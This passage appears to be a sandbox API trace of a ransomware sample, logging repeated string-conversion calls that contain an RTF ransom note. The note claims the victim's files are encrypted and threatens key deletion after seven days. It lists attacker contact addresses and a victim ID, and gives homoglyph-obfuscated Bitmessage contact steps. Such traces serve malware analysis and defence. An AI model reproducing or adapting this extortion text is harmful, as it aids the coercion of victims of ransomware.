\\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.345] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 